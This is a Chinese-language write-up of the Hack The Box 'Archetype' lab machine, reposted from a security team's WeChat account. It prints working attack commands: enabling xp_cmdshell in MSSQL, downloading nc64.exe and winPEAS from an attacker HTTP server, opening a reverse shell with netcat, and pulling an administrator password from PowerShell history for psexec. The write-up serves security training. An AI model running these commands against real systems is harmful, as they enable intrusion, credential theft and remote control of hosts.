Hack The Box-start point-Archetype笔记

admin
admin
admin
103632
文章
87
评论
2024年4月28日17:03:02评论8 views字数 2246阅读7分29秒阅读模式
点击蓝字,关注我们

Hack The Box-start point-Archetype笔记

Archetype

Task1:

Hack The Box-start point-Archetype笔记

  使用nmap扫描工具对IP进行扫描,得到开放端口及详细信息

nmap -sC -sV ip-sV:探测开放的端口的系统/服务信息
Hack The Box-start point-Archetype笔记
Hack The Box-start point-Archetype笔记

Task2:

Hack The Box-start point-Archetype笔记

  使用smbclient工具查看主机上可用的共享

smbclient -N -L ip
Hack The Box-start point-Archetype笔记

  发现除了ADMIN$、C$和IPC$之外,还有一个backups,尝试空密码连接。

smbclient \\IP\backups或smbclient -N\\IP\backup

  连接成功,则backups为非管理共享

Hack The Box-start point-Archetype笔记

Task3:

Hack The Box-start point-Archetype笔记

  连接成功后输入ls命令,发现存在prod.dtsConfig文件,使用get命令下载并查看发现密码

Hack The Box-start point-Archetype笔记

Task4

Hack The Box-start point-Archetype笔记

  首先了解impacket

  Impacket介绍:

    Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。

  项目地址:

    https://github.com/SecureAuthCorp/impacket

  于是下载该项目并安装

    git clone https://github.com/SecureAuthCorp/impacket.git

Hack The Box-start point-Archetype笔记
Hack The Box-start point-Archetype笔记

  我们使用task3中的账号密码进行登陆

python3 mssqlclient.py ARCHETYPE/sql_svc@IP -windows-auth

  并使用命令判断我们是否为sysadmin,返回1代表true

select is_srvrolemember('sysadmin');
Hack The Box-start point-Archetype笔记

Task5:

  根据上方help命令结果中可以知道大概是xp_cmdshell存储过程

Hack The Box-start point-Archetype笔记

  对xp_cmdshell是否开启做测试,发现以及被关闭了,需要重新打开

Hack The Box-start point-Archetype笔记

  用sp_configure将xp_cmdshell重新启动

exec sp_configure "show advanced options",1;reconfigure;exec sp_configure "xp_cmdshell",1;reconfigure;
Hack The Box-start point-Archetype笔记

  成功启动

Hack The Box-start point-Archetype笔记

  在本机作准备,开启HTTP SERVER,并使用nc等待目标机回连。

  在下载的nc目录下开启http server:sudo python3 -m http.server 80

  并监听1234端口。

Hack The Box-start point-Archetype笔记

  我们要在目标主机上上传文件,但由于我们不是管理员用户,不一定有权限在当前目录上传,先查看当前目录,可以用xp_cmdshell “powershell -c pwd”命令

  下载好Windows的nc后,将nc上传过去

xp_cmdshell "powershell -c cd C:Userssql_svcDownloads; wget http://10.10.15.166/nc64.exe -outfile nc64.exe"
Hack The Box-start point-Archetype笔记

  使用nc的-e参数,连接本机的1234端口

xp_cmdshell "powershell -c cd C:Userssql_svcDownloads; ./nc64.exe -e cmd.exe IP 1234"

  并且在桌面找到user flag

Hack The Box-start point-Archetype笔记
Hack The Box-start point-Archetype笔记

  执行net user命令发现目前用户和administrator用户不在同一组,所以需要提权

Task6

Hack The Box-start point-Archetype笔记

  根据task6的hint可知使用winPEAS工具

  下载地址:

https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe

Hack The Box-start point-Archetype笔记

  下载后在shell中上传到目标主机上

Hack The Box-start point-Archetype笔记
powershell -c "wget http://10.10.15.166/winPEASx64.exe -outfile winPEASx64.exe

  运行该软件进行扫描,再扫描结果中发现Current Token privileges有SeImpersonatePrivilege,容易受到 juicy potato 的攻击。首先检查可以找到凭据的两个现有文件。

Hack The Box-start point-Archetype笔记

  由于这是一个普通用户帐户以及服务帐户,因此值得检查频繁访问的文件或执行的命令。在检查结果中,发现在PowerShell Settings中,有PS的历史记录文件ConsoleHost_history.txt,它相当于 Linux 系统的.bash_history。ConsoleHost_history.txt位于目录C:Userssql_svcAppDataRoamingMicrosoftWindowsPowerShellPSReadline。

Hack The Box-start point-Archetype笔记

Task7:

Hack The Box-start point-Archetype笔记

  找到ConsoleHost_history.txt文件并查看得到administrator密码

Hack The Box-start point-Archetype笔记

  得到admin的密码后可以用Impcaket工具包里的脚本psexec.py来横向,得到administrator的shell

Hack The Box-start point-Archetype笔记

  进入桌面目录,看到root.txt,得到root flag

Hack The Box-start point-Archetype笔记

Hack The Box-start point-Archetype笔记

扫码关注
微信号:hanlu_security
QQ交流群:553897268

原文始发于微信公众号(寒鹭网络安全团队):Hack The Box-start point-Archetype笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月28日17:03:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hack The Box-start point-Archetype笔记https://cn-sec.com/archives/2695154.html

发表评论

匿名网友 填写信息